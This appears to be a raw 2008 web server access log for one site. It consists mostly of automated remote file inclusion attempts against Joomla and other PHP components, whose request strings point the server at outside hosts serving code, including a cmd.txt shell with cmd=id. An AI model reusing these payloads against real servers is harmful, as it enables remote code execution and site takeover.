153.19.101.68 - - [17/Feb/2008:07:08:20 -0800] "GET /task.php?task=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [17/Feb/2008:07:08:20 -0800] "GET /task.php?task=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.108 - - [17/Feb/2008:07:08:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.91 - - [17/Feb/2008:07:08:46 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.38.88.68 - - [17/Feb/2008:07:10:21 -0800] "GET /logs/index2.php?option=com_joomla§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
196.38.88.68 - - [17/Feb/2008:07:10:21 -0800] "GET /index2.php?option=com_joomla§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:11:01 -0800] "GET /logs/access_080108.log/index2.php?option=com_admin&task=listcomponents=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:11:01 -0800] "GET /index2.php?option=com_admin&task=listcomponents=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:11:02 -0800] "GET /logs/index2.php?option=com_admin&task=listcomponents=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:14:29 -0800] "GET /logs/access_071230.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:14:31 -0800] "GET //components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:14:32 -0800] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:14:46 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:14:47 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:14:47 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:07:16:09 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:07:16:09 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.50.141 - - [17/Feb/2008:07:17:06 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.50.141 - - [17/Feb/2008:07:17:06 -0800] "GET /index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.50.141 - - [17/Feb/2008:07:17:06 -0800] "GET /logs/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:07:17:18 -0800] "GET /index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:07:17:19 -0800] "GET /logs/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
194.30.169.80 - - [17/Feb/2008:07:17:31 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [17/Feb/2008:07:17:32 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [17/Feb/2008:07:17:32 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.23.4 - - [17/Feb/2008:07:18:06 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [17/Feb/2008:07:18:06 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [17/Feb/2008:07:18:06 -0800] "GET /index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [17/Feb/2008:07:18:06 -0800] "GET /index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [17/Feb/2008:07:18:06 -0800] "GET /logs/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [17/Feb/2008:07:18:06 -0800] "GET /logs/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.172 - - [17/Feb/2008:07:18:13 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:07:19:55 -0800] "GET /index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.203.227 - - [17/Feb/2008:07:20:25 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
62.193.203.227 - - [17/Feb/2008:07:20:25 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
200.163.40.10 - - [17/Feb/2008:07:21:26 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cestari.angelfire.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:21:29 -0800] "GET /logs/access_080121.log/components/com_forum/download.php?phpbb_root_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:21:30 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:21:30 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.175.3 - - [17/Feb/2008:07:22:14 -0800] "GET /logs/access_080118.log//club/index.php?option=com_rsgalleryhttp://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [17/Feb/2008:07:22:14 -0800] "GET //club/index.php?option=com_rsgalleryhttp://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [17/Feb/2008:07:22:14 -0800] "GET /logs//club/index.php?option=com_rsgalleryhttp://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.200.222.72 - - [17/Feb/2008:07:22:23 -0800] "GET /logs/access_071230.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.222.72 - - [17/Feb/2008:07:22:23 -0800] "GET //components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.222.72 - - [17/Feb/2008:07:22:23 -0800] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.181.6.216 - - [17/Feb/2008:07:22:29 -0800] "GET /logs/access_071228.log/admin.php?include_path=http://194.181.6.216/chez/kupa/spread1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.181.6.216 - - [17/Feb/2008:07:22:29 -0800] "GET /admin.php?include_path=http://194.181.6.216/chez/kupa/spread1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.181.6.216 - - [17/Feb/2008:07:22:30 -0800] "GET /logs/admin.php?include_path=http://194.181.6.216/chez/kupa/spread1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:07:22:55 -0800] "GET /logs/access_080130.log/?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:07:22:56 -0800] "GET /?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:07:22:57 -0800] "GET /logs/?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 200 34972 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.50.141 - - [17/Feb/2008:07:23:00 -0800] "GET /logs/access_080131.log/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.50.141 - - [17/Feb/2008:07:23:00 -0800] "GET /index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.50.141 - - [17/Feb/2008:07:23:00 -0800] "GET /logs/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.31.153.4 - - [17/Feb/2008:07:23:42 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.31.153.4 - - [17/Feb/2008:07:23:42 -0800] "GET /index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.31.153.4 - - [17/Feb/2008:07:23:42 -0800] "GET /logs/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:07:24:04 -0800] "GET /logs/access_071228.log/index.php?sub=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:07:24:04 -0800] "GET /logs/index.php?sub=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.237.64.193 - - [17/Feb/2008:07:24:22 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [17/Feb/2008:07:24:23 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [17/Feb/2008:07:24:23 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.52.238.34 - - [17/Feb/2008:07:24:41 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [17/Feb/2008:07:24:41 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [17/Feb/2008:07:24:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:07:24:43 -0800] "GET /logs/access_071231.log/?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:07:24:48 -0800] "GET /logs//index2.php?pag=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:07:24:48 -0800] "GET //index2.php?pag=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:24:52 -0800] "GET /logs/access_071220.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:24:53 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:24:53 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:24:53 -0800] "GET /logs/access_071220.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:24:54 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:24:54 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:25:04 -0800] "GET /logs/access_071216.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:25:04 -0800] "GET /logs/access_071216.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:07:25:10 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:07:25:11 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:07:25:11 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:25:29 -0800] "GET /logs/access_080105.log/index.php?incl=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:25:29 -0800] "GET /index.php?incl=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:25:30 -0800] "GET /logs/index.php?incl=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:25:30 -0800] "GET /logs/access_080105.log/index.php?incl=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:25:32 -0800] "GET /index.php?incl=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:25:32 -0800] "GET /logs/index.php?incl=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:25:41 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.175.3 - - [17/Feb/2008:07:25:54 -0800] "GET /logs/access_071230.log//club/index.php?option=com_rsgalleryhttp://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:26:08 -0800] "GET /logs/access_071228.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:26:08 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:26:09 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.160.31.2 - - [17/Feb/2008:07:26:26 -0800] "GET /!scanhttp://www.icel.edu.mx//mambots/content/mosthumb/thumbs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:26:35 -0800] "GET /logs/access_071228.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:26:36 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:26:36 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.41.19 - - [17/Feb/2008:07:26:37 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [17/Feb/2008:07:26:38 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [17/Feb/2008:07:26:38 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:07:27:24 -0800] "GET /logs/access_080121.log/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:07:27:33 -0800] "GET /logs/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.55.48.7 - - [17/Feb/2008:07:27:35 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.capsoir.com/images/cmd.txt?&cmd=id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [17/Feb/2008:07:27:35 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.capsoir.com/images/cmd.txt?&cmd=id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [17/Feb/2008:07:27:36 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.capsoir.com/images/cmd.txt?&cmd=id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.58.242.138 - - [17/Feb/2008:07:27:39 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [17/Feb/2008:07:27:40 -0800] "GET /index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [17/Feb/2008:07:27:41 -0800] "GET /logs/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:07:28:55 -0800] "GET /logs/access_080131.log/index.php?pagina=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:07:28:55 -0800] "GET /index.php?pagina=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:07:28:56 -0800] "GET /logs/index.php?pagina=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:07:29:39 -0800] "GET /logs/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:07:29:40 -0800] "GET /index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:07:30:12 -0800] "GET /logs/access_080108.log/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.8.190 - - [17/Feb/2008:07:30:39 -0800] "GET /index2.php?option=com_mamml§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
65.98.8.190 - - [17/Feb/2008:07:30:40 -0800] "GET /logs/index2.php?option=com_mamml§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
